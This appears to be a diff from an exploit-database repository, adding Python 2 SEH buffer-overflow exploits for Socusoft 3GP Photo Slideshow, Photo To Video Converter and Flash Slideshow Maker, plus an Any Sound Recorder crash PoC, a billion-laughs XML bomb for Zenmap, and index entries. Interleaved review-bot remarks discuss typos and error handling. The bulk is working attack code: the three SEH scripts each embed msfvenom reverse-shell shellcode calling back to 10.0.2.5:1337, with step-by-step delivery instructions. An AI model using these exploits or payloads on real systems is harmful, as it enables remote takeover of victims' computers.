buf += "\xc9\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\x0f\xa5\x03"
buf += "\xc9\x73\x51\x41\x32\x8b\xa2\x26\xba\x6e\x93\x66\xd8"
buf += "\xfb\x84\x56\xaa\xa9\x28\x1c\xfe\x59\xba\x50\xd7\x6e"
buf += "\x0b\xde\x01\x41\x8c\x73\x71\xc0\x0e\x8e\xa6\x22\x2e"
buf += "\x41\xbb\x23\x77\xbc\x36\x71\x20\xca\xe5\x65\x45\x86"
buf += "\x35\x0e\x15\x06\x3e\xf3\xee\x29\x6f\xa2\x65\x70\xaf"
buf += "\x45\xa9\x08\xe6\x5d\xae\x35\xb0\xd6\x04\xc1\x43\x3e"
buf += "\x55\x2a\xef\x7f\x59\xd9\xf1\xb8\x5e\x02\x84\xb0\x9c"
buf += "\xbf\x9f\x07\xde\x1b\x15\x93\x78\xef\x8d\x7f\x78\x3c"
buf += "\x4b\xf4\x76\x89\x1f\x52\x9b\x0c\xf3\xe9\xa7\x85\xf2"
buf += "\x3d\x2e\xdd\xd0\x99\x6a\x85\x79\xb8\xd6\x68\x85\xda"
buf += "\xb8\xd5\x23\x91\x55\x01\x5e\xf8\x31\xe6\x53\x02\xc2"
buf += "\x60\xe3\x71\xf0\x2f\x5f\x1d\xb8\xb8\x79\xda\xbf\x92"
buf += "\x3e\x74\x3e\x1d\x3f\x5d\x85\x49\x6f\xf5\x2c\xf2\xe4"
buf += "\x05\xd0\x27\xaa\x55\x7e\x98\x0b\x05\x3e\x48\xe4\x4f"
buf += "\xb1\xb7\x14\x70\x1b\xd0\xbf\x8b\xcc\xd5\x3f\x91\x09"
buf += "\x82\x3d\x95\x14\x6b\xcb\x73\x7c\x9b\x9d\x2c\xe9\x02"
buf += "\x84\xa6\x88\xcb\x12\xc3\x8b\x40\x91\x34\x45\xa1\xdc"
buf += "\x26\x32\x41\xab\x14\x95\x5e\x01\x30\x79\xcc\xce\xc0"
buf += "\xf4\xed\x58\x97\x51\xc3\x90\x7d\x4c\x7a\x0b\x63\x8d"
buf += "\x1a\x74\x27\x4a\xdf\x7b\xa6\x1f\x5b\x58\xb8\xd9\x64"
buf += "\xe4\xec\xb5\x32\xb2\x5a\x70\xed\x74\x34\x2a\x42\xdf"
buf += "\xd0\xab\xa8\xe0\xa6\xb3\xe4\x96\x46\x05\x51\xef\x79"
buf += "\xaa\x35\xe7\x02\xd6\xa5\x08\xd9\x52\xd5\x42\x43\xf2"
buf += "\x7e\x0b\x16\x46\xe3\xac\xcd\x85\x1a\x2f\xe7\x75\xd9"
buf += "\x2f\x82\x70\xa5\xf7\x7f\x09\xb6\x9d\x7f\xbe\xb7\xb7"
pad ="C" * (1500 - len(buffer) - len(nseh+seh) - len(nops) -len(buf))
exploit = buffer + nseh + seh + nops + buf + pad
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(exploit)
f.write(exploit)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
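Review bot: the bare `except:` around the file write swallows every exception, including KeyboardInterrupt and the real reason the write failed (permissions, read-only directory); catch `IOError as e` and print it. The offset `buffer = "A" * (548-36)` has no comment explaining what the 36 accounts for, unlike the sibling 3GP script which states the offset as a single number; document it. Header typos: "Regestration" and "poped".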


@ -0,0 +1,63 @@
# Exploit Title: Socusoft 3GP Photo Slideshow 8.05 - Buffer Overflow (SEH)
# Date: 2018-09-08
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Software Link:http://www.dvd-photo-slideshow.com/3gp-photo-slideshow.html
# Tested Version: 8.05
# Tested on OS: Windows XP Service Pack 3 x86
# Steps to Reproduce:
# 1. Run the python exploit script, it will create a new file with the name "exploit.txt".
# 2. Just copy the text inside "exploit.txt".
# 3. Start the program. In the new window click "Help" > "Register ...
# 4. Now paste the content of "exploit.txt" into the field:"Registration Name" + "Regestration Key". Click "Apply" > "Ok"
# You will see a sweet reverse shell poped up in your attacker box.
buffer = "A" * (512)
# 0x10030b2d : pop ebx # pop ecx # ret | ascii {PAGE_EXECUTE_READ} [DVDPhotoData.dll]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.5.0 (
# C:\Program Files\Socusoft\Socusoft 3GP Photo Slideshow\DVDPhotoData.dll)
nseh = "\xeb\x06\x90\x90"
seh = "\x2d\x0b\x03\x10"
nops = "\x90" * 18
#Badchar \x00\x0a\x0d
#sudo msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.0.2.5 LPORT=1337 -b '\x00\x0a\x0d' -f python
buf = ""
buf += "\xb8\x4c\xab\xe1\x3c\xd9\xd0\xd9\x74\x24\xf4\x5b\x33"
buf += "\xc9\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\x0f\xa5\x03"
buf += "\xc9\x73\x51\x41\x32\x8b\xa2\x26\xba\x6e\x93\x66\xd8"
buf += "\xfb\x84\x56\xaa\xa9\x28\x1c\xfe\x59\xba\x50\xd7\x6e"
buf += "\x0b\xde\x01\x41\x8c\x73\x71\xc0\x0e\x8e\xa6\x22\x2e"
buf += "\x41\xbb\x23\x77\xbc\x36\x71\x20\xca\xe5\x65\x45\x86"
buf += "\x35\x0e\x15\x06\x3e\xf3\xee\x29\x6f\xa2\x65\x70\xaf"
buf += "\x45\xa9\x08\xe6\x5d\xae\x35\xb0\xd6\x04\xc1\x43\x3e"
buf += "\x55\x2a\xef\x7f\x59\xd9\xf1\xb8\x5e\x02\x84\xb0\x9c"
buf += "\xbf\x9f\x07\xde\x1b\x15\x93\x78\xef\x8d\x7f\x78\x3c"
buf += "\x4b\xf4\x76\x89\x1f\x52\x9b\x0c\xf3\xe9\xa7\x85\xf2"
buf += "\x3d\x2e\xdd\xd0\x99\x6a\x85\x79\xb8\xd6\x68\x85\xda"
buf += "\xb8\xd5\x23\x91\x55\x01\x5e\xf8\x31\xe6\x53\x02\xc2"
buf += "\x60\xe3\x71\xf0\x2f\x5f\x1d\xb8\xb8\x79\xda\xbf\x92"
buf += "\x3e\x74\x3e\x1d\x3f\x5d\x85\x49\x6f\xf5\x2c\xf2\xe4"
buf += "\x05\xd0\x27\xaa\x55\x7e\x98\x0b\x05\x3e\x48\xe4\x4f"
buf += "\xb1\xb7\x14\x70\x1b\xd0\xbf\x8b\xcc\xd5\x3f\x91\x09"
buf += "\x82\x3d\x95\x14\x6b\xcb\x73\x7c\x9b\x9d\x2c\xe9\x02"
buf += "\x84\xa6\x88\xcb\x12\xc3\x8b\x40\x91\x34\x45\xa1\xdc"
buf += "\x26\x32\x41\xab\x14\x95\x5e\x01\x30\x79\xcc\xce\xc0"
buf += "\xf4\xed\x58\x97\x51\xc3\x90\x7d\x4c\x7a\x0b\x63\x8d"
buf += "\x1a\x74\x27\x4a\xdf\x7b\xa6\x1f\x5b\x58\xb8\xd9\x64"
buf += "\xe4\xec\xb5\x32\xb2\x5a\x70\xed\x74\x34\x2a\x42\xdf"
buf += "\xd0\xab\xa8\xe0\xa6\xb3\xe4\x96\x46\x05\x51\xef\x79"
buf += "\xaa\x35\xe7\x02\xd6\xa5\x08\xd9\x52\xd5\x42\x43\xf2"
buf += "\x7e\x0b\x16\x46\xe3\xac\xcd\x85\x1a\x2f\xe7\x75\xd9"
buf += "\x2f\x82\x70\xa5\xf7\x7f\x09\xb6\x9d\x7f\xbe\xb7\xb7"
pad ="C" * (1500 - len(buffer) - len(nseh+seh) - len(nops) -len(buf))
exploit = buffer + nseh + seh + nops + buf + pad
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(exploit)
f.write(exploit)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
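Review bot: the bare `except:` in the last three lines of the hunk swallows every exception, including `KeyboardInterrupt`, and reports only `File cannot be created` with no reason; narrow it to `except IOError as e:` and print `e` so a read-only directory or permission problem is actually visible. Two smaller points: `buffer` rebinds a Python 2 builtin type of the same name (rename it to `junk` or `offset`), and step 4 of the header misspells `Registration` as `Regestration`. The script is Python 2 only (`print` statements, `str` byte buffers), which is worth stating in the header since `python` resolves to Python 3 on many systems.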

View file

@ -0,0 +1,69 @@
# Exploit Title: Photo To Video Converter Professional 8.07 - Buffer Overflow (SEH)
# Date: 2018-09-08
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Software Link:hhttp://www.dvd-photo-slideshow.com/photo-to-video-converter.html
# Tested Version: 8.05
# Tested on OS: Windows XP Service Pack 3 x86
# Steps to Reproduce:
# 1. Run the python exploit script, it will create a new file with the name "exploit.txt".
# 2. Just copy the text inside "exploit.txt".
# 3. Start the program. In the new window click "Help" > "Register ...
# 4. Now paste the content of "exploit.txt" into the field:"Registration Name" + "Regestration Key".
# Click "Apply" > "Ok"
# You will see a sweet reverse shell poped up in your attacker box.
buffer = "A" * 502
buffer += "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x30"
# 0x10015a62 : pop esi # pop edi # ret | ascii {PAGE_EXECUTE_READ}
# [DVDPhotoData.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0
# (C:\Program Files\Socusoft\Socusoft Photo To Video Converter Professional\DVDPhotoData.dll)
nseh = "\xeb\x06\x90\x90"
seh = "\x62\x5a\x01\x10"
nops = "\x90" * 18
# Badchar \x00\x0a\x0d
# sudo msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.0.2.5
# LPORT=1337 -b '\x00\x0a\x0d' -f python
buf = ""
buf += "\xb8\x4c\xab\xe1\x3c\xd9\xd0\xd9\x74\x24\xf4\x5b\x33"
buf += "\xc9\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\x0f\xa5\x03"
buf += "\xc9\x73\x51\x41\x32\x8b\xa2\x26\xba\x6e\x93\x66\xd8"
buf += "\xfb\x84\x56\xaa\xa9\x28\x1c\xfe\x59\xba\x50\xd7\x6e"
buf += "\x0b\xde\x01\x41\x8c\x73\x71\xc0\x0e\x8e\xa6\x22\x2e"
buf += "\x41\xbb\x23\x77\xbc\x36\x71\x20\xca\xe5\x65\x45\x86"
buf += "\x35\x0e\x15\x06\x3e\xf3\xee\x29\x6f\xa2\x65\x70\xaf"
buf += "\x45\xa9\x08\xe6\x5d\xae\x35\xb0\xd6\x04\xc1\x43\x3e"
buf += "\x55\x2a\xef\x7f\x59\xd9\xf1\xb8\x5e\x02\x84\xb0\x9c"
buf += "\xbf\x9f\x07\xde\x1b\x15\x93\x78\xef\x8d\x7f\x78\x3c"
buf += "\x4b\xf4\x76\x89\x1f\x52\x9b\x0c\xf3\xe9\xa7\x85\xf2"
buf += "\x3d\x2e\xdd\xd0\x99\x6a\x85\x79\xb8\xd6\x68\x85\xda"
buf += "\xb8\xd5\x23\x91\x55\x01\x5e\xf8\x31\xe6\x53\x02\xc2"
buf += "\x60\xe3\x71\xf0\x2f\x5f\x1d\xb8\xb8\x79\xda\xbf\x92"
buf += "\x3e\x74\x3e\x1d\x3f\x5d\x85\x49\x6f\xf5\x2c\xf2\xe4"
buf += "\x05\xd0\x27\xaa\x55\x7e\x98\x0b\x05\x3e\x48\xe4\x4f"
buf += "\xb1\xb7\x14\x70\x1b\xd0\xbf\x8b\xcc\xd5\x3f\x91\x09"
buf += "\x82\x3d\x95\x14\x6b\xcb\x73\x7c\x9b\x9d\x2c\xe9\x02"
buf += "\x84\xa6\x88\xcb\x12\xc3\x8b\x40\x91\x34\x45\xa1\xdc"
buf += "\x26\x32\x41\xab\x14\x95\x5e\x01\x30\x79\xcc\xce\xc0"
buf += "\xf4\xed\x58\x97\x51\xc3\x90\x7d\x4c\x7a\x0b\x63\x8d"
buf += "\x1a\x74\x27\x4a\xdf\x7b\xa6\x1f\x5b\x58\xb8\xd9\x64"
buf += "\xe4\xec\xb5\x32\xb2\x5a\x70\xed\x74\x34\x2a\x42\xdf"
buf += "\xd0\xab\xa8\xe0\xa6\xb3\xe4\x96\x46\x05\x51\xef\x79"
buf += "\xaa\x35\xe7\x02\xd6\xa5\x08\xd9\x52\xd5\x42\x43\xf2"
buf += "\x7e\x0b\x16\x46\xe3\xac\xcd\x85\x1a\x2f\xe7\x75\xd9"
buf += "\x2f\x82\x70\xa5\xf7\x7f\x09\xb6\x9d\x7f\xbe\xb7\xb7"
pad ="C" * (1500 - len(buffer) - len(nseh+seh) - len(nops) -len(buf))
exploit = buffer + nseh + seh + nops + buf + pad
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(exploit)
f.write(exploit)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
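Review bot: the header is internally inconsistent: the title says 8.07 but `# Tested Version: 8.05`, and the `# Software Link:` URL starts with `hhttp://`, so it does not resolve. Confirm which version was actually tested and fix the scheme; the `v8.0.6.0` in the DLL comment is the DLL's own version and does not settle it. As in the sibling scripts, the bare `except:` at the end of the hunk hides the real write error; `except IOError as e:` with the message printed is enough, and `Regestration` in step 4 should read `Registration`.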

View file

@ -0,0 +1,63 @@
# Exploit Title: Flash Slideshow Maker Professional 5.20 - Buffer Overflow (SEH)
# Date: 2018-09-08
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Software Link:http://flash.dvd-photo-slideshow.com/
# Tested Version: 5.20
# Tested on OS: Windows XP Service Pack 3 x86
# Steps to Reproduce:
# 1. Run the python exploit script, it will create a new file with the name "exploit.txt".
# 2. Just copy the text inside "exploit.txt".
# 3. Start the program. In the new window click "Help" > "Register ...
# 4. Now paste the content of "exploit.txt" into the field:"Name" + "Code" > Click "Ok"
# You will see a sweet reverse shell poped up in your attacker box.
buffer = "A" * 1328
# 0x1011063f : pop eax # pop esi # ret | ascii {PAGE_EXECUTE_READ}
# [cximage.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.9.9.c
# (C:\Program Files\Flash Slideshow Maker Professional\cximage.dll)
nseh = "\xeb\x06\x90\x90"
seh = "\x3f\x06\x11\x10"
nops = "\x90" * 18
# Badchar \x00\x0a\x0d
# sudo msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.0.2.5 LPORT=1337 -b '\x00\x0a\x0d' -f python
buf = ""
buf += "\xb8\x4c\xab\xe1\x3c\xd9\xd0\xd9\x74\x24\xf4\x5b\x33"
buf += "\xc9\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\x0f\xa5\x03"
buf += "\xc9\x73\x51\x41\x32\x8b\xa2\x26\xba\x6e\x93\x66\xd8"
buf += "\xfb\x84\x56\xaa\xa9\x28\x1c\xfe\x59\xba\x50\xd7\x6e"
buf += "\x0b\xde\x01\x41\x8c\x73\x71\xc0\x0e\x8e\xa6\x22\x2e"
buf += "\x41\xbb\x23\x77\xbc\x36\x71\x20\xca\xe5\x65\x45\x86"
buf += "\x35\x0e\x15\x06\x3e\xf3\xee\x29\x6f\xa2\x65\x70\xaf"
buf += "\x45\xa9\x08\xe6\x5d\xae\x35\xb0\xd6\x04\xc1\x43\x3e"
buf += "\x55\x2a\xef\x7f\x59\xd9\xf1\xb8\x5e\x02\x84\xb0\x9c"
buf += "\xbf\x9f\x07\xde\x1b\x15\x93\x78\xef\x8d\x7f\x78\x3c"
buf += "\x4b\xf4\x76\x89\x1f\x52\x9b\x0c\xf3\xe9\xa7\x85\xf2"
buf += "\x3d\x2e\xdd\xd0\x99\x6a\x85\x79\xb8\xd6\x68\x85\xda"
buf += "\xb8\xd5\x23\x91\x55\x01\x5e\xf8\x31\xe6\x53\x02\xc2"
buf += "\x60\xe3\x71\xf0\x2f\x5f\x1d\xb8\xb8\x79\xda\xbf\x92"
buf += "\x3e\x74\x3e\x1d\x3f\x5d\x85\x49\x6f\xf5\x2c\xf2\xe4"
buf += "\x05\xd0\x27\xaa\x55\x7e\x98\x0b\x05\x3e\x48\xe4\x4f"
buf += "\xb1\xb7\x14\x70\x1b\xd0\xbf\x8b\xcc\xd5\x3f\x91\x09"
buf += "\x82\x3d\x95\x14\x6b\xcb\x73\x7c\x9b\x9d\x2c\xe9\x02"
buf += "\x84\xa6\x88\xcb\x12\xc3\x8b\x40\x91\x34\x45\xa1\xdc"
buf += "\x26\x32\x41\xab\x14\x95\x5e\x01\x30\x79\xcc\xce\xc0"
buf += "\xf4\xed\x58\x97\x51\xc3\x90\x7d\x4c\x7a\x0b\x63\x8d"
buf += "\x1a\x74\x27\x4a\xdf\x7b\xa6\x1f\x5b\x58\xb8\xd9\x64"
buf += "\xe4\xec\xb5\x32\xb2\x5a\x70\xed\x74\x34\x2a\x42\xdf"
buf += "\xd0\xab\xa8\xe0\xa6\xb3\xe4\x96\x46\x05\x51\xef\x79"
buf += "\xaa\x35\xe7\x02\xd6\xa5\x08\xd9\x52\xd5\x42\x43\xf2"
buf += "\x7e\x0b\x16\x46\xe3\xac\xcd\x85\x1a\x2f\xe7\x75\xd9"
buf += "\x2f\x82\x70\xa5\xf7\x7f\x09\xb6\x9d\x7f\xbe\xb7\xb7"
pad ="C" * (2300 - len(buffer) - len(nseh+seh) - len(nops) -len(buf))
exploit = buffer + nseh + seh + nops + buf + pad
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(exploit)
f.write(exploit)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
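Review bot: the `pad` target of 2300 differs from the 1500 used in the sibling Socusoft scripts and nothing in the header explains it; a one-line comment stating the total input length this build expects would save the next tester a debugging session. Also `poped` should be `popped` in the header, and the bare `except:` should become `except IOError as e:` with the error printed rather than a generic message.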

View file

@ -0,0 +1,33 @@
# Exploit Title: Any Sound Recorder 2.93 - Denial of Service (PoC)
# Date: 2018-09-09
# Exploit Author: T3jv1l
# Vendor Homepage: http://www.any-sound-recorder.com
# Software: http://www.any-sound-recorder.com/anysoundrecorder.exe
# Version: Any Sound Recorder 2.93
# Tested on: Windows 7 SP1 x86
#!/usr/bin/python
import struct
print"""
#1. Download and install the setup file
#2. A file "Byte.txt" will be created
#3. Click Help > Enter key code... in tool bar
#4. Copy the contents of the file (Byte.txt) and paste in the Username Name field
#5. Click Register and BOOMMMM !!!!
totalsize = 7000 # total size buff
buffer= "\x41" * 900 #Offset
nseh= "BBBB" # next seh address
seh= "CCCC" # seh address
shellcode= "T" * (totalsize-len(buffer+nseh+seh))
payload = buffer + nseh + seh + shellcode
try:
f=open("Byte.txt","w")
print "[+] Creating %s bytes payload..." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
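Review bot: as rendered, the triple-quoted string opened by `print"""` before step 1 is never closed, so everything from `#1.` to the end of the file is string content and the interpreter fails with `EOF while scanning triple-quoted string literal`; a closing `"""` after the `#5.` line is needed (the hunk header counts 33 lines and only 29 are shown, so it may have been lost in rendering, but the committed file should be checked). Further: the `#!/usr/bin/python` shebang on the eighth line is inert, since a shebang is only honoured on the first line; `import struct` is unused; `shellcode` holds filler bytes (`"T" * ...`) rather than shellcode, so a name like `filler` would be more honest; and the steps jump from installing the program to "A file Byte.txt will be created" without saying to run the script first.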

View file

@ -0,0 +1,52 @@
# Exploit Title: Nmap 7.70 - Denial of Service (PoC)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-09-10
# Software Link: https://nmap.org/dist/nmap-7.70-setup.exe
# Tested Version: 7.70 (ZenMap)
# Tested on OS: Windows 7 32bit
# Description: This vunerability causes the program to crash and start to heavily consume
# system resources. Do not test on critical systems, can cause system crash.
# Steps to reproduce:
# 1. Create a file in Notepad with the following and save it as "test.xml":
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
<!ENTITY lol11 "&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;">
<!ENTITY lol12 "&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;">
<!ENTITY lol13 "&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;">
<!ENTITY lol14 "&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;">
<!ENTITY lol15 "&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;">
<!ENTITY lol16 "&lol15;&lol15;&lol15;&lol15;&lol15;&lol15;&lol15;&lol15;&lol15;&lol15;">
<!ENTITY lol17 "&lol16;&lol16;&lol16;&lol16;&lol16;&lol16;&lol16;&lol16;&lol16;&lol16;">
<!ENTITY lol18 "&lol17;&lol17;&lol17;&lol17;&lol17;&lol17;&lol17;&lol17;&lol17;&lol17;">
<!ENTITY lol19 "&lol18;&lol18;&lol18;&lol18;&lol18;&lol18;&lol18;&lol18;&lol18;&lol18;">
<!ENTITY lol20 "&lol19;&lol19;&lol19;&lol19;&lol19;&lol19;&lol19;&lol19;&lol19;&lol19;">
<!ENTITY lol21 "&lol20;&lol20;&lol20;&lol20;&lol20;&lol20;&lol20;&lol20;&lol20;&lol20;">
<!ENTITY lol22 "&lol21;&lol21;&lol21;&lol21;&lol21;&lol21;&lol21;&lol21;&lol21;&lol21;">
<!ENTITY lol23 "&lol22;&lol22;&lol22;&lol22;&lol22;&lol22;&lol22;&lol22;&lol22;&lol22;">
<!ENTITY lol24 "&lol23;&lol23;&lol23;&lol23;&lol23;&lol23;&lol23;&lol23;&lol23;&lol23;">
<!ENTITY lol25 "&lol24;&lol24;&lol24;&lol24;&lol24;&lol24;&lol24;&lol24;&lol24;&lol24;">
<!ENTITY lol26 "&lol25;&lol25;&lol25;&lol25;&lol25;&lol25;&lol25;&lol25;&lol25;&lol25;">
<!ENTITY lol27 "&lol26;&lol26;&lol26;&lol26;&lol26;&lol26;&lol26;&lol26;&lol26;&lol26;">
<!ENTITY lol28 "&lol27;&lol27;&lol27;&lol27;&lol27;&lol27;&lol27;&lol27;&lol27;&lol27;">
<!ENTITY lol29 "&lol28;&lol28;&lol28;&lol28;&lol28;&lol28;&lol28;&lol28;&lol28;&lol28;">
<!ENTITY lol30 "&lol29;&lol29;&lol29;&lol29;&lol29;&lol29;&lol29;&lol29;&lol29;&lol29;">
]>
<lolz>&lol30;</lolz>
# 2. Open Zenmap > Scan > Open Scan > "test.xml"
# 3. Crash
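Review bot: the `# Exploit Title:` line says `Nmap 7.70` while `# Tested Version:` and the files_exploits.csv entry say Zenmap; the crash happens when the Zenmap GUI imports a scan result, not in the nmap scanner, so the title should read `Zenmap (Nmap) 7.70` as the CSV does. The description should also name the root cause: the DTD defines 30 nested entities, each expanding to ten copies of the previous one, so `&lol30;` expands to 10^30 copies of `lol` (recursive entity expansion), which is what exhausts memory; parsers that enforce an entity expansion limit reject this document outright. Typos: `Discovey` should be `Discovery`, `vunerability` should be `vulnerability`.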

View file

@ -9939,6 +9939,15 @@ id,file,description,date,author,type,platform,port
45325,exploits/windows_x86/local/45325.py,"iSmartViewPro 1.5 - 'DDNS' Buffer Overflow",2018-09-04,"Luis Martínez",local,windows_x86,
45346,exploits/windows/local/45346.py,"DVD Photo Slideshow Professional 8.07 - Buffer Overflow (SEH)",2018-09-07,T3jv1l,local,windows,
45349,exploits/windows_x86/local/45349.py,"iSmartViewPro 1.5 - 'SavePath for ScreenShots' Local Buffer Overflow (SEH)",2018-09-07,"Gionathan Reale",local,windows_x86,
45350,exploits/windows_x86/local/45350.py,"SocuSoft iPod Photo Slideshow 8.05 - Buffer Overflow (SEH)",2018-09-10,"Shubham Singh",local,windows_x86,
45352,exploits/windows_x86/local/45352.py,"Socusoft 3GP Photo Slideshow 8.05 - Buffer Overflow (SEH)",2018-09-10,"Shubham Singh",local,windows_x86,
45353,exploits/windows_x86/local/45353.py,"Photo To Video Converter Professional 8.07 - Buffer Overflow (SEH)",2018-09-10,"Shubham Singh",local,windows_x86,
45354,exploits/windows/local/45354.txt,"Microsoft Baseline Security Analyzer 2.3 - XML External Entity Injection",2018-09-10,hyp3rlinx,local,windows,
45355,exploits/windows_x86/local/45355.py,"Flash Slideshow Maker Professional 5.20 - Buffer Overflow (SEH)",2018-09-10,"Shubham Singh",local,windows_x86,
45356,exploits/windows_x86/local/45356.py,"Any Sound Recorder 2.93 - Denial of Service (PoC)",2018-09-10,T3jv1l,local,windows_x86,
45357,exploits/windows_x86/local/45357.txt,"Zenmap (Nmap) 7.70 - Denial of Service (PoC)",2018-09-10,"Gionathan Reale",local,windows_x86,
45369,exploits/linux/local/45369.rb,"Ghostscript - Failed Restore Command Execution (Metasploit)",2018-09-10,Metasploit,local,linux,
45372,exploits/linux/local/45372.txt,"VirtualBox 5.2.6.r120293 - VM Escape",2018-08-28,"Reno Robert",local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16767,6 +16776,7 @@ id,file,description,date,author,type,platform,port
45333,exploits/windows_x86/remote/45333.py,"FTPShell Server 6.80 - 'Add Account Name' Buffer Overflow (SEH)",2018-09-05,"Luis Martínez",remote,windows_x86,
45283,exploits/hardware/remote/45283.rb,"Eaton Xpert Meter 13.4.0.10 - SSH Private Key Disclosure",2018-08-29,BrianWGray,remote,hardware,
45345,exploits/linux/remote/45345.txt,"Tenable WAS-Scanner 7.4.1708 - Remote Command Execution",2018-09-07,"Sameer Goyal",remote,linux,
45367,exploits/multiple/remote/45367.rb,"Apache Struts 2 - Namespace Redirect OGNL Injection (Metasploit)",2018-09-10,Metasploit,remote,multiple,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -39063,7 +39073,7 @@ id,file,description,date,author,type,platform,port
42634,exploits/hardware/webapps/42634.txt,"Huawei HG255s - Directory Traversal",2017-09-07,"Ahmet Mersin",webapps,hardware,
42636,exploits/php/webapps/42636.txt,"Babysitter Website Script 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",webapps,php,
42637,exploits/php/webapps/42637.txt,"Job Board Software 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",webapps,php,
42638,exploits/php/webapps/42638.py,"RPi Cam Control <= 6.3.14 - Multiple Vulnerabilities",2017-08-16,"Alexander Korznikov",webapps,php,
42638,exploits/php/webapps/42638.py,"RPi Cam Control < 6.3.14 - Multiple Vulnerabilities",2017-08-16,"Alexander Korznikov",webapps,php,
42639,exploits/php/webapps/42639.txt,"Just Dial Marketplace 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",webapps,php,
42641,exploits/php/webapps/42641.txt,"Professional Service Booking 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",webapps,php,
42642,exploits/php/webapps/42642.txt,"Restaurant Website Script 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",webapps,php,
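Review bot: the only change in this hunk narrows the 42638 title from `<= 6.3.14` to `< 6.3.14`, which moves version 6.3.14 from affected to unaffected, and the commit message lists the old and new titles without saying why. A version-range correction like this should cite its source (vendor changelog or the advisory's fixed-version statement) in the commit message; otherwise a reader cannot tell whether 6.3.14 is the fixed release or the original `<=` was a typo.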
@ -39932,3 +39942,5 @@ id,file,description,date,author,type,platform,port
45344,exploits/php/webapps/45344.txt,"MedDream PACS Server Premium 6.7.1.1 - 'email' SQL Injection",2018-09-07,"Carlos Avila",webapps,php,80
45347,exploits/php/webapps/45347.txt,"Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal",2018-09-07,"Carlos Avila",webapps,php,
45348,exploits/hardware/webapps/45348.txt,"QNAP Photo Station 5.7.0 - Cross-Site Scripting",2018-09-07,"Mitsuaki Shiraishi",webapps,hardware,
45351,exploits/hardware/webapps/45351.py,"LW-N605R 12.20.2.1486 - Remote Code Execution",2018-09-10,"Nassim Asrir",webapps,hardware,
45361,exploits/linux/webapps/45361.py,"RPi Cam Control < 6.4.25 - 'preview.php' Remote Command Execution",2018-09-04,"Reigning Shells",webapps,linux,
